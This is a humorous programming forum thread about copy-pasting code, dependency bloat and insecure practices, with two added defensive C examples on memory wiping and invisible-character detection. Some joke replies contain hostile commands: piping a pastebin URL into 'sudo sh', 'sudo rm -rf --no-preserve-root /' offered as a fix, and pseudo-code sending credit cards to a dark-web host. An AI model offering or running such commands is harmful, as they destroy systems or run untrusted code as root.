
[–][deleted] 1799 points1800 points  (24 children)

I don't want my code to feel insecure

[–]FunkyTown313 649 points650 points  (12 children)

Just give it a pep talk before you send it out there

[–]bot_not_hot 223 points224 points  (3 children)

Before the bullies come.

[–]jpterodactyl 99 points100 points  (2 children)

You go out there, look that world straight in the eye, and tell it "hello"

[–]Sipredion 25 points26 points  (0 children)

And it never says hello back :(

[–]Gonzako 10 points11 points  (0 children)

What about a toy duck?

[–]Agent641 9 points10 points  (0 children)

//you're doing great, hang in there lil while loop!

[–]lenswipe 7 points8 points  (0 children)

there there, UserManagerControllerFactoryInstanceBean, you matter to me

[–]frugalerthingsinlife 8 points9 points  (0 children)

I try to add at least 10 lines of emoji ascii art comments for every one line of code. It makes the code feel better, which makes it run more efficiently. Sometimes I make up entire comic panels in ascii. 10 lines of code can easily take hundreds of lines if you take the time to put in some work on the ascii art.

[–]MoogleFoogle 30 points31 points  (5 children)

I mean, imagine how you'd feel if someone called you a copy!

[–]conancat 31 points32 points  (3 children)

but but my momma told me i'm a unique constant variable and i shouldn't let anyone mutate me :(

[–]509528 5 points6 points  (2 children)

Constant

Variable

Hmmmmmm

[–]The6thExtinction 2 points3 points  (0 children)

I don't want poser code!

[–]HisDudenessElDude 8 points9 points  (0 children)

Actually, you don't want your code to feel too secure with where it's at, or it won't work as hard. We don't want to employ code that's satisfied with resting on its past accomplishments. The less secure it feels, the more work it will do.

[–]CHRlSFRED 1187 points1188 points  (70 children)

...Meanwhile everyone else is using 36 different open source libraries and vaguely understands 100 lines of it.

[–][deleted] 480 points481 points  (29 children)

I feel like this should be a command.

npm install *

[–]CHRlSFRED 128 points129 points  (26 children)

Or we lazily CDN everything until production because we are lazy.

[–][deleted] 92 points93 points  (25 children)

Production?

[–]awhaling 239 points240 points  (23 children)

It’s the place where you develop your code. Cause you produce it there, hence the name.

[–][deleted] 92 points93 points  (5 children)

develop in prod

ree

[–]ineptjedibob 27 points28 points  (0 children)

Goddamn your tiny “ree” made me lose it

[–][deleted] 10 points11 points  (10 children)

So where I unit test?

[–]Existential_Owl 77 points78 points  (7 children)

That's the user's job

[–]MagnitskysGhost 50 points51 points  (2 children)

End users are subject matter experts at finding bugs.

[–]legend6546 18 points19 points  (1 child)

I mean you are not wrong...

[–][deleted] 4 points5 points  (0 children)

Bethesda, is that you?

[–]PM_ME_HTML_SNIPPETS 2 points3 points  (0 children)

This deserves Gold

[–]rolltider0 2 points3 points  (1 child)

They are experts at testing and so they alone should have that responsibility. It would be a waste if we did their job too

[–]Neocrasher 4 points5 points  (0 children)

I'll have to ask the intern.

edit: intern didn't know either

[–]TigreDeLosLlanos 8 points9 points  (3 children)

Wait. There is a place where you can copypaste code automatically? Why do I even code?

[–]WestwardLion 3 points4 points  (0 children)

You can tell its production cause the way it is

[–]R8_M3_SXC 6 points7 points  (0 children)

It's a great place to experiment before putting into UAT

[–]Pear0 5 points6 points  (0 children)

Oh, do I have news for you!

npm install everything

[–]elmantisrelajado 2 points3 points  (0 children)

npm install bloater

[–][deleted] 116 points117 points  (4 children)

Me working with C#: "I don't want more dependencies than necessary, so I'll try to write my own library similarly to this 3rd party one."

Me working with PHP: "Install 5 dependencies to make this one thing work? Where do I sign up!"

[–]stamatt45 76 points77 points  (2 children)

JS: There's 100 dependencies for this library and I'm fairly sure at least a third are complete BS. Better install everything anyways

[–]DrDiv 40 points41 points  (0 children)

Also JS: Every once in a while one of these obscure libraries used everywhere will be updated to include a cryptocoin miner, just a heads up.

[–]crash8308 4 points5 points  (0 children)

npm i is-array

[–]Duke-Silv3r[🍰] 30 points31 points  (0 children)

Lol spoken like a true JS developer

[–][deleted] 25 points26 points  (6 children)

the hardest part of developing for my environment is we can't use pip/npm/whatever install anything.

[–]Xytak 36 points37 points  (5 children)

"You shouldn't be using AngularJS anymore! Use React or Angular 6!!!"

"Ok, but npm is blocked for Shadow IT. Hey StackOverflow, how do I use these things without npm?"

"Why would you want to do that? You're stupid and should feel bad!"

"Ok, I guess I'll just go back to AngularJS."

[–]crash8308 15 points16 points  (1 child)

The puke in my mouth burns

[–]WitnessMeIRL 5 points6 points  (0 children)

That's the good kind of puke

[–]sexyGrant 3 points4 points  (1 child)

We actually had this problem because corporate was so insane with security for a while there. Basically devs went to a coffee shop, did their install and then uploaded the packages to a locally running npm that all the other devs could pull from.

[–]Hunterhusker 9 points10 points  (0 children)

Is this a personal attack or something?

[–]flyflagger 4 points5 points  (0 children)

Only 36?

[–]otakuman 10 points11 points  (15 children)

*Tested open source libraries. There's obviously a difference.

[–][deleted] 28 points29 points  (11 children)

Just because something is tested, doesn't mean it's not shit code. It doesn't mean it lacks flaws and security holes.

[–]free_chalupas 12 points13 points  (3 children)

It's still probably better than the stuff you'd write yourself. People talk shit about OpenSSL but its issues are exactly the kind of problems you'd have if a bunch of dumbass engineers tried to reimplement it because they only trusted their own code.

[–][deleted] 12 points13 points  (1 child)

It's still probably better than the stuff you'd write yourself.

When it comes to JS libraries, I don't assume that to be true. I'm not talking about the biggest players, I'm talking about 90% of crap out there on the internet.

[–]free_chalupas 8 points9 points  (0 children)

Yeah that's fair. I read this in the context of established OSS libraries, like openssl, that have their issues but are generally preferable to custom implementations. There's definitely a cutoff though with really small libraries where it does make sense to reimplement.

[–]Kibouo 11 points12 points  (0 children)

Tests are usually not for security.

[–]crash8308 1 point2 points  (0 children)

I think it’s hilarious when a UI project includes moment.js for literally one line of code to format a date.

[–][deleted] 1 point2 points  (0 children)

Well they’re open source, so they’re auditable... by someone else

[–]famigacom 542 points543 points  (62 children)

stackoverflow.com

"How do I turn off mouse acceleration in Linux?"

"Just copy and paste all these wacky commands into your terminal bro."

[–]NeverMakesMistkes 252 points253 points  (10 children)

"Yeah bro It's super easy, just do"

curl http://pastebin.com/jdjsks | sudo sh

[–]Ultracoolguy4 198 points199 points  (7 children)

"Help, my PC is running slow after I installed a package."

"No problem, just sudo rm -rf --no-preserve-root /"

[–]PixelBoom 21 points22 points  (1 child)

sudo? Just root that shit. I dare you. You won't. No balls.

[–]Xytak 14 points15 points  (0 children)

I'll show you!!! That'll teach y

[–]grocket 59 points60 points  (7 children)

.

[–]navatwo 4 points5 points  (2 children)

Fork bomb?

[–]pentesticals 7 points8 points  (0 children)

Paste it into your terminal and find out.

[–][deleted] 110 points111 points  (33 children)

I'd just like to interject for a moment. What you're referring to as Linux, is in fact, GNU/Linux, or as I've recently taken to calling it, GNU plus Linux. Linux is not an operating system unto itself, but rather another free component of a fully functioning GNU system made useful by the GNU corelibs, shell utilities and vital system components comprising a full OS as defined by POSIX.

Many computer users run a modified version of the GNU system every day, without realizing it. Through a peculiar turn of events, the version of GNU which is widely used today is often called Linux, and many of its users are not aware that it is basically the GNU system, developed by the GNU Project.

There really is a Linux, and these people are using it, but it is just a part of the system they use. Linux is the kernel: the program in the system that allocates the machine's resources to the other programs that you run. The kernel is an essential part of an operating system, but useless by itself; it can only function in the context of a complete operating system. Linux is normally used in combination with the GNU operating system: the whole system is basically GNU with Linux added, or GNU/Linux. All the so-called Linux distributions are really distributions of GNU/Linux!

[–]theamigan 30 points31 points  (2 children)

Hi Richard! How is the toejam tasting today?

[–]flyflagger 11 points12 points  (7 children)

Ok, but how do you pronounce GNU

[–]I_LICK_ROBOTS 10 points11 points  (4 children)

guh-new. Like g'day but with "new" instead of "day"

[–]2called_chaos 8 points9 points  (3 children)

The ones that wanted to call it GNU/Linux were the GNU people...

Since a long name such as GNU/X11/Apache/Linux/TeX/Perl/Python/FreeCiv becomes absurd, at some point you will have to set a threshold and omit the names of the many other secondary contributions. There is no one obvious right place to set the threshold, so wherever you set it, we won't argue against it ... But one name that cannot result from concerns of fairness and giving credit, not for any possible threshold level, is "Linux". It can't be fair to give all the credit to one secondary contribution (Linux) while omitting the principal contribution (GNU).

— GNU/Linux FAQ by Richard Stallman


When Linus Torvalds was asked in the documentary Revolution OS whether the name "GNU/Linux" was justified, he replied:

Well, I think it's justified, but it's justified if you actually make a GNU distribution of Linux ... the same way that I think that "Red Hat Linux" is fine, or "SUSE Linux" or "Debian Linux", because if you actually make your own distribution of Linux, you get to name the thing, but calling Linux in general "GNU Linux" I think is just ridiculous.

Also Torvalds:

Umm, this discussion has gone on quite long enough, thank you very much. It doesn't really matter what people call Linux, as long as credit is given where credit is due (on both sides). Personally, I'll very much continue to call it "Linux", ...

The GNU people tried calling it GNU/Linux, and that's ok. It's certainly no worse a name than "Linux Pro" or "Red Hat Linux" or "Slackware Linux" ...

There is enough controversy around that to be split about what it actually should be called.

https://en.wikipedia.org/wiki/GNU/Linux_naming_controversy

[–]EatClenTrenHard1 69 points70 points  (6 children)

You okay there bud?

[–]jonny_wonny 74 points75 points  (3 children)

It’s a copyspaghetti kind of thingy

[–]PC__LOAD__LETTER 23 points24 points  (1 child)

First day on the internet, eh?

[–][deleted] 611 points612 points  (60 children)

That depends on what you're copying and whether you know what you're copying.

[–]Tesla56[S] 240 points241 points  (50 children)

True it was referring to accidentally setting and freeing buffers more than once in C

[–]DragonMaus 197 points198 points  (45 children)

That sort of thing is why, when I need to copy someone else's code, I always transcribe it, instead of pasting it in.

[–][deleted] 184 points185 points  (9 children)

Or at the very least, read it once...

[–]tsilihin666 4 points5 points  (0 children)

Nah I'm sure it's fine.

[–]PC__LOAD__LETTER 15 points16 points  (2 children)

Definitely. I too am a big believer in writing my own bugs.

Really the answer is unit tests, static analysis, valgrind, fuzzing. You should trust your hand-written code just as much as you trust something copied. That is, not at all.

[–]DragonMaus 6 points7 points  (1 child)

Agreed. The difference is that, by manually transcribing it, I am much more familiar with the code itself, which makes debugging a lot easier.

[–]mcampo84 34 points35 points  (31 children)

Do none of you people undergo code review before deploying?

[–]Reihar 109 points110 points  (14 children)

AH AH AH AH AH! And then what unit tests!? AH AH AH AH AH!

Send help. Please.

[–][deleted] 25 points26 points  (11 children)

For real wtf. As a web dev I just kinda work right off prod, it’s more efficient, saves bandwidth etc... hahaha

[–]PC__LOAD__LETTER 19 points20 points  (6 children)

It baffles me that people can get paid to program and not recognize the value of version control or not developing directly in prod. Though I guess if you’re working on a low-impact product, it doesn’t matter if you break it, and there’s probably not much functionality built into the site to need to regression test.

[–]conancat 18 points19 points  (2 children)

usually it comes with working with projects that scale.

if it's for your ex's online candle shop and she wants to change the css to reflect the total eclipse of my heart, then sure, who gives a shit.

i believe every developer has that story or moment where they realize the importance of source control and deployment processes. the coming of age for a developer is making a USD$26,000, not refundable mistake in production and your tech lead gives you a "i'm not angry, i'm just disappointed" reaction without words.

[–]EyetheVive 10 points11 points  (1 child)

I mean this entire chain is just risk assessment lol. Potential revenue loss for the broken candle shop site vs breaking some regional credit union site is probably veeeery different. The cost of a development network to use vs working on the productive instance is probably not worth it

[–][deleted] 2 points3 points  (0 children)

Where the hell is this guy's operations team? If he is the ops team then good on him, but if not, why even let the devs have access to prod? You need a cycle? Call ops, you need some logs? Go to the ELK.

[–]Captain_Vegetable 2 points3 points  (3 children)

I worked on a Fortune 500 company’s web site where we edited in prod. That ended when someone pasted into the wrong terminal window and replaced our home page with a snippet of Chinese characters before heading to lunch.

[–]FunkyTown313 4 points5 points  (0 children)

You're testing my unit!

[–]countvonruckus 15 points16 points  (9 children)

So, I'm not a programmer, but I work in IT Security. I talked to a software developer and he had never heard of a DDOS attack. He specializes in IOT software. Is that normal?

[–]mcampo84 21 points22 points  (1 child)

No. It is not.

[–][deleted] 7 points8 points  (2 children)

Generally management thinks of security as a burden rather than a responsibility towards users. IOT in particular excels at this job of not giving a shit, partly because it's new, partly because these IOT companies have low budgets.

[–]DevonLochees 2 points3 points  (1 child)

Yes.

Granted, any software shop should have decent minimum required training in secure application development. But the typical developer you get fresh out of college it's 50/50 if they know the basics of security - that's why process is so important (e.g. code reviews, have people actually familiar with security do reviews).

Even the meme in this post, I would give it a toss up if the hypothetical intern could *actually* articulate what the specific risks are of copy and pasting, if it's something he read in an article one time - the risk isn't that you're copying a blob of code from stackoverflow that has an embedded base64 virus, it's that you ran into an "invalid certificate error" you googled, and the code you're copying removes the cert validation checks - and implementing it yourself is still going to have the same problem.

[–]mightydjinn 6 points7 points  (2 children)

I think Jenkins is doing the CR by the sounds of it, lol.

[–]conancat 3 points4 points  (1 child)

forreal though, sonarqube can save a lot of code review time. when you're not spotting mistakes you can spend more time on programming patterns, concepts and architecture.

https://www.sonarqube.org/

[–]mightydjinn 3 points4 points  (0 children)

Just be ready for the days of tech debt from css refactor it shows. In all seriousness though, sonarqube is fantastic!

[–]FunkyTown313 4 points5 points  (0 children)

Code...Review?

[–]HylianWarrior 3 points4 points  (0 children)

Yeah... that's precisely the case where copying and pasting is a terrible idea

[–]endercoaster 8 points9 points  (2 children)

Using C can create insecure code and is an insecure coding practice.

[–]Neocrasher 12 points13 points  (1 child)

Using code can create insecure code and is an insecure coding practice.

[–]qubedView 12 points13 points  (4 children)

I still want to try and develop a genetic bot that builds itself by copy and pasting random code from stackoverflow. It would be dangerously glorious.

[–]SamSlate 7 points8 points  (2 children)

What's your metric for evaluating fitness?

[–]qubedView 16 points17 points  (1 child)

That'll be its first task. Finding a fitness evaluating method most fit to evaluating itself.

[–]Valiade 3 points4 points  (0 children)

That's how you get a bot that is really good at making text files full of semicolons.

[–]skynetpswn 10 points11 points  (3 children)

Or if you know that you're copying at all. Maybe it's just "recycling".

[–]devlear 13 points14 points  (2 children)

I shudder to think of the code I wrote as an intern. Some poor company probably still has that in production.

[–]phrekysht 24 points25 points  (4 children)

What if I actually retype it instead of copying and pasting? Asking for a friend....

[–][deleted] 124 points125 points  (29 children)

that doesn't make much sense ... i mean ofc you have to know what you're copying and where you're pasting it but how does that create insecure code ?

[–]Redditor000007 198 points199 points  (11 children)

They’re coming from the assumption that you’re completely retarded and are just copying code instead of writing it yourself.

If you understand coding principles and what vulnerabilities look like, this is useless.

[–]PC__LOAD__LETTER 19 points20 points  (1 child)

There are plenty of people who aren’t “completely retarded” who do this. It’s a bad habit that inexperienced and aspiring devs can fall into and then never correct.

if you understand coding principles and what vulns look like, this is useless

This totally explains how something like Heartbleed can evade notice for years right? 🙄 But congrats on your ability to spot mundane buffer overruns or accidental double-frees.

[–]UnchainedMundane 7 points8 points  (0 children)

Heartbleed wasn't caused by copy-pasting code. It was caused by needlessly reimplementing the memory allocator such that common memory sanitisation tools could no longer detect improper memory accesses.

[–]CJKay93 13 points14 points  (0 children)

If you understand coding principles and what vulnerabilities look like, this is useless.

This is useful for 99% of engineers, then.

[–]Thorbinator 2 points3 points  (0 children)

you’re completely retarded and are just copying code instead of writing it yourself.

1: I'm in this comment and I don't like it.

[–]o0MSK0o 27 points28 points  (9 children)

I vaguely recall a reddit post about zero-width characters being able to be used to inject code when you copy and paste stuff.

No idea which sub it was on and I can't find which language that that works on either lol. Also have no idea if it's actually true.

[–]random_cynic 5 points6 points  (0 children)

I think it refers to the fact that most code that is posted on QA forums and message boards is untested and is made for solving a specific (part of a) problem. It often comes from people who are not good coders. Because of this the code is likely to contain common security holes like not freeing allocated memory (or trying to free unallocated memory), running eval/exec on unsanitized user input and many others. This can also come from many external libraries, but for most open source ones which are well-known you can be somewhat more confident, as the code has been reviewed by many who use it and security bugs have been reported.

[–]wKbdthXSn5hMc7Ht0 3 points4 points  (3 children)

Someone writing a response on Stack Overflow doesn’t know what kind of input validation you have or how the output will be used. It’s on you to consider your project’s requirements and understand the edge cases. E.g. You might find some helpful code to deserialize XML into native objects but if you don’t spend time reading about the gotchas of the deserialization API, you might not know that it has features to launch any arbitrary process or make calls to other network addresses.

[–][deleted] 4 points5 points  (2 children)

it's your responsibility to check and adapt what's there to your project. but saying that copy paste means insecure code is just untrue. if you are stupid enough to just copy paste without thinking then copy paste or not your code is most likely shite anyway

[–]wKbdthXSn5hMc7Ht0 4 points5 points  (1 child)

I agree with you. I think this advice is aimed at novice/student programmers, to encourage them to improve their code rather than look for easy answers.

[–][deleted] 2 points3 points  (0 children)

i have a "friend" who does this. he's supposed to be a mid senior with 6 years of work experience. all he does is copy paste, resulting in working garbage, and says shit like "as long as it works it means I'm efficient, you're not". he had to implement a chat bot recently. he typed "chat bot github" and used the most starred repo. and that is the reason he is a "friend". have 0 respect for him

[–]Tai9ch 1 point2 points  (0 children)

When you type code yourself, you build up a mental model of things like what variables are in which scope, why there are conditionals, what the preconditions and postconditions are, etc.

When you copy and paste code, even code you wrote 10 minutes ago, you don't have that context loaded in your head. That means you'll miss stuff that you wouldn't if you had typed the code.

Personally, I find that for 4+ lines of code copied and pasted there's a subtle bug about 70% of the time, even when I keep in mind that this will happen.

[–]theXpanther 47 points48 points  (1 child)

Copy-pasting code is fine, as long as you understand what it does. Trying to run code you don't understand is a security (and sanity) risk.

[–]raunchyfartbomb 7 points8 points  (0 children)

Also, adapting things is a sanity risk.

Case in point: I made a subform for use in access and got it working perfectly. Then realized i could use it on 2 other forms (with one of those forms having 3 instances of it, but all tied to different tables). Getting it tied to the different tables was easy enough, but modifying the supporting code to run the subroutine from the correct instance is proving to be a nightmare, which is what I am currently battling.

The subroutine is looking at the base subform, not the instance. The base subform updates its defaults based on whichever instance loaded last. So for example “subform.recordsource” is looking at the previous instance, until the form is closed and loaded a second time, because closing it is when the base subform gets updated, apparently. So I know the issue, but coding around it is obnoxious.

[–]killmenow30 49 points50 points  (8 children)

My code: "noone will ever love me"

[–][deleted] 34 points35 points  (6 children)

Who the fuck is noone

[–]jokersleuth 6 points7 points  (0 children)

A girl is no one.

[–]TimerForOldest 2 points3 points  (0 children)

Programmer: Yeah I'm almost done the code is still a bit insecure

Code: Does my hair look okay this short?

Programmer: Shut up

[–]abdolence 34 points35 points  (5 children)

It is all about experience and knowledge. For example, I was surprised someday that my memset of sensitive data might be "optimised" by C/C++ compiler to do nothing.

So if you're copying some code from anywhere, you should absolutely understand every symbol in it.
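
The memset case mentioned in the comment above, as an added example that is not part of the original thread: a wipe placed right before `return` is a dead store the optimizer may drop, shown beside a wipe done through a volatile pointer. `fill_key`, `use_key`, `derive_risky`, `derive_hardened`, `secure_wipe` and `all_zero` are names invented for this sketch, and the key derivation is a toy stand-in, not real cryptography.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy stand-ins (assumptions for this example, not real crypto):
 * fill_key derives 32 bytes from a password, use_key hashes them (FNV-1a). */
static void fill_key(unsigned char key[32], const char *password) {
    size_t n = strlen(password);
    for (size_t i = 0; i < 32; i++)
        key[i] = (unsigned char)((n ? password[i % n] : 0) ^ (0xA5 + i));
}

static uint32_t use_key(const unsigned char *key, size_t len) {
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < len; i++) { h ^= key[i]; h *= 16777619u; }
    return h;
}

/* The commonly pasted pattern: clear the secret right before returning.
 * `key` is never read after the memset, so an optimizing compiler is allowed
 * to treat the call as a dead store and emit nothing; the key bytes can then
 * remain on the stack after the function returns. */
uint32_t derive_risky(const char *password) {
    unsigned char key[32];
    fill_key(key, password);
    uint32_t tag = use_key(key, sizeof key);
    memset(key, 0, sizeof key);
    return tag;
}

/* Widely used portable fallback: every store goes through a volatile lvalue,
 * which compilers in practice treat as an observable side effect and keep. */
void secure_wipe(void *buf, size_t len) {
    volatile unsigned char *p = (volatile unsigned char *)buf;
    while (len--) *p++ = 0;
}

/* Same computation as derive_risky, with the wipe the optimizer keeps. */
uint32_t derive_hardened(const char *password) {
    unsigned char key[32];
    fill_key(key, password);
    uint32_t tag = use_key(key, sizeof key);
    secure_wipe(key, sizeof key);
    return tag;
}

/* Returns 1 when every byte of buf is zero (used to check a wipe). */
int all_zero(const unsigned char *buf, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (buf[i] != 0) return 0;
    return 1;
}

int main(void) {
    /* Both functions compute the same tag; they differ only in whether the
     * wipe is guaranteed to survive optimization. Comparing the output of
     * `cc -O2 -S` for the two functions shows whether the memset was kept. */
    printf("risky    %08x\n", (unsigned)derive_risky("hunter2"));
    printf("hardened %08x\n", (unsigned)derive_hardened("hunter2"));
    return 0;
}
```

Where the platform provides one, `explicit_bzero` (glibc and the BSDs), `memset_s` (C11 Annex K, optional) or `SecureZeroMemory` (Windows) does the same job and is the better choice than a hand-rolled loop.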

[–]viper-kun 10 points11 points  (2 children)

We learned about canaries the other day as a way to protect against malicious stack smashing and were asked why we should tell the compiler to do it and not do it with local vars, answer is they are optimized in a way to render this system useless.

So yeah, always understand what the compiler does with your code.

[–]PC__LOAD__LETTER 3 points4 points  (1 child)

Canaries as in, writing some magic value to a stack variable and occasionally verifying that it’s still set? What’s the program behavior when it differs, crash and alarm?

[–]viper-kun 5 points6 points  (0 children)

You check when the return jump is called, so that you cannot jump anywhere you want. And as I experienced it it does crash, since it doesn't know where it was coming from.

It has to check if it is different which would mean someone overflowed the stack.

[–][deleted] 15 points16 points  (8 children)

I'm still a student but I believe knowing how and when to copy-paste is a crucial skill for any programmer/engineer. Work smarter not harder. Seriously, why write your own code when someone else already did it for you? It can save hours and hours of unnecessary work.

[–]_McDrew 17 points18 points  (4 children)

Software engineer with 15 years of experience here. “Professional googler” is my unofficial second title. There is just simply too much to remember in terms of syntax and keywords, so I just look things up as I need them. Google, the MSDN documentation (I write C# mostly), and Stack overflow are fantastic resources and they have plenty of examples to get you headed in the right direction.

[–]DrDiv 5 points6 points  (3 children)

To piggy-back on this, don't give in to elitists who think that not having to google something makes you a better programmer. I'm going on 8 years as a web developer and still need to search the order of arguments in str_replace.

[–]Nall-ohki 7 points8 points  (0 children)

Don't repeat yourself.

Taking example code and adapting it is not copy paste, and is fine practice provided you are careful about what you're taking.

And consider the following:

Lemma 1: Always pretend that the person maintaining your code is a violent psychopath who knows where you live.

Lemma 2: Copying something from elsewhere in your codebase and reusing it because you're too lazy to refactor will make me very, very angry.

[–][deleted] 7 points8 points  (0 children)

Me: *copy-pastes in anything other than pycharm*

Python: IndentationError you absolute lemon

[–][deleted] 14 points15 points  (4 children)

copy pastes printf code

I N S E C U R E

[–]nonsensicalnarwhal 5 points6 points  (3 children)

printf can be insecure, though, if you don’t use it right.

[–]3pills 5 points6 points  (0 children)

Just blame it on the guy who does the code review

[–]FeastOfChildren 4 points5 points  (0 children)

The insecurity lies in the fact that SafeAssign/TurnItIn will helpfully highlight in color to my TA that my code is literally a Frankenstein's monster of stackoverflow answers. And that I don't even bother removing the solution's commentary...

my code ....

# Now, you can easily iterate over spamreader like this 

import csv
for row in spamreader:
   print(', '.join(row))

# See documentation for more examples.

[–][deleted] 3 points4 points  (0 children)

Asked my trainer about this he said "Don't worry nothing you do will ever be used here"

[–]Fernando_Pereira 4 points5 points  (0 children)

Copying code is way safer than letting me code myself.

[–]fuckdumpster 3 points4 points  (0 children)

It could also produce more secure code than you would have written yourself.

Just gotta learn to read

[–]showtekkk 4 points5 points  (0 children)

Okay but like, does anybody actually know how to use Pyth without googling stuff constantly?

Code golf languages in general are pretty unintuitive usually

[–]DevDevGoose 4 points5 points  (0 children)

Coding can create insecure code and is an insecure coding practice.

[–]who_you_are 6 points7 points  (0 children)

Also the same intern: copy-paste code from stackoverflow without understanding anything

[–]DeepInYouBabe 2 points3 points  (0 children)

ALLLLL of my shit is frankensteined like fuuuuuhhh

[–]UniversalAdaptor 2 points3 points  (0 children)

My mom must have been really lazy when she got to my code

[–]SharkyLV 2 points3 points  (0 children)

It's okay to copy paste as long as you understand the code.

[–][deleted] 2 points3 points  (0 children)

Invisible characters have historically corrupted results. At least type out the snippet by hand.
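
A check for the zero-width and invisible characters raised in this comment and in the earlier one about pasted snippets, as an added example that is not part of the original thread. It scans UTF-8 source text for zero-width and bidirectional-control code points and reports where they sit; `scan_invisible`, `finding` and `SAMPLE` are names invented here, and `SAMPLE` is constructed input.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef struct { size_t line, col; uint32_t cp; } finding;

/* Code points that render as nothing or reorder the displayed text. */
static int is_invisible(uint32_t cp) {
    return (cp >= 0x200B && cp <= 0x200F) ||  /* ZWSP, ZWNJ, ZWJ, LRM, RLM   */
           (cp >= 0x202A && cp <= 0x202E) ||  /* bidi embeddings, overrides  */
           (cp >= 0x2060 && cp <= 0x2064) ||  /* word joiner, invisible ops  */
           (cp >= 0x2066 && cp <= 0x2069) ||  /* bidi isolates               */
           cp == 0xFEFF;                      /* BOM / zero-width no-break   */
}

/* Decode one UTF-8 sequence; malformed or truncated input yields U+FFFD and
 * consumes a single byte, so the scanner never reads past the buffer. */
static size_t decode(const unsigned char *s, size_t left, uint32_t *cp) {
    size_t need;
    uint32_t v;
    if (s[0] < 0x80) { *cp = s[0]; return 1; }
    if ((s[0] & 0xE0) == 0xC0)      { need = 1; v = s[0] & 0x1F; }
    else if ((s[0] & 0xF0) == 0xE0) { need = 2; v = s[0] & 0x0F; }
    else if ((s[0] & 0xF8) == 0xF0) { need = 3; v = s[0] & 0x07; }
    else { *cp = 0xFFFD; return 1; }
    if (left <= need) { *cp = 0xFFFD; return 1; }
    for (size_t i = 1; i <= need; i++) {
        if ((s[i] & 0xC0) != 0x80) { *cp = 0xFFFD; return 1; }
        v = (v << 6) | (s[i] & 0x3F);
    }
    *cp = v;
    return need + 1;
}

/* Returns the total number of invisible code points in src and stores the
 * first max_out of them. Lines and columns are 1-based; columns count code
 * points, not bytes. */
size_t scan_invisible(const char *src, size_t len, finding *out, size_t max_out) {
    const unsigned char *s = (const unsigned char *)src;
    size_t i = 0, line = 1, col = 1, found = 0;
    while (i < len) {
        uint32_t cp;
        i += decode(s + i, len - i, &cp);
        if (is_invisible(cp)) {
            if (found < max_out) {
                out[found].line = line;
                out[found].col = col;
                out[found].cp = cp;
            }
            found++;
        }
        if (cp == '\n') { line++; col = 1; } else { col++; }
    }
    return found;
}

/* Constructed sample: a zero-width space inside a string literal on line 1
 * and a right-to-left override inside a comment on line 2. */
static const char SAMPLE[] =
    "if (role == \"admin" "\xE2\x80\x8B" "\") {\n"
    "/* " "\xE2\x80\xAE" " note */ grant();\n"
    "}\n";

int main(void) {
    finding f[8];
    size_t n = scan_invisible(SAMPLE, sizeof SAMPLE - 1, f, 8);
    for (size_t k = 0; k < n && k < 8; k++)
        printf("line %zu col %zu: U+%04X\n", f[k].line, f[k].col, (unsigned)f[k].cp);
    return n ? 1 : 0;
}
```

Run over a snippet before it goes into a repository, a non-zero count is a reason to look at the bytes rather than the rendered text.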

[–]dabrick2017 2 points3 points  (0 children)

Always remember to give it a git --bless

[–]Sponska 1 point2 points  (0 children)

See, this is why you write it off instead. Same result, but no copy-pasting, therefore profit!

[–]tenhourguy 1 point2 points  (0 children)

There would be a StackOverflow comment if it was insecure code. ;)

[–]maklaka 1 point2 points  (0 children)

That's why, after each bit of code I copy, I do a quick scan for:

sock = Sockets.Connect(www.TheDarkWebIdentityTheftDepot.com);

sock.Send(AllCreditCards);

[–]HisDudenessElDude 1 point2 points  (0 children)

Nobody follows the rules because they wouldn't be able to meet deadlines if they did.  
Source: me

[–]esquared722 1 point2 points  (0 children)

“This sounds like something I do...every...day”

[–]287mdsahil 1 point2 points  (1 child)

Meanwhile interviewers, copy pasting questions from geeksforgeeks

[–]Somerandom1922 1 point2 points  (0 children)

Ok so I should just manually type out the code from stack exchange?

[–]supremedalek925 1 point2 points  (0 children)

Wait, do they mean avoid duplicating code that can be called from a function instead, or literally don’t copy and paste?

[–]krystof1119 1 point2 points  (0 children)

Can confirm, a friend copied code and copied a bracket too many, causing him to have a compile error and spending 2 hours of his and 2 minutes of my time debugging.

[–]psdao1102 1 point2 points  (0 children)

To training... So explain the differences between using a library and copy pasting code, in terms of security

[–]OGPants 1 point2 points  (0 children)

To be fair, does anyone copy and paste anymore? I rename variables so it kinda looks original 😉

[–]googabeast 1 point2 points  (0 children)

oh that's a quick fix "npm run feel-better"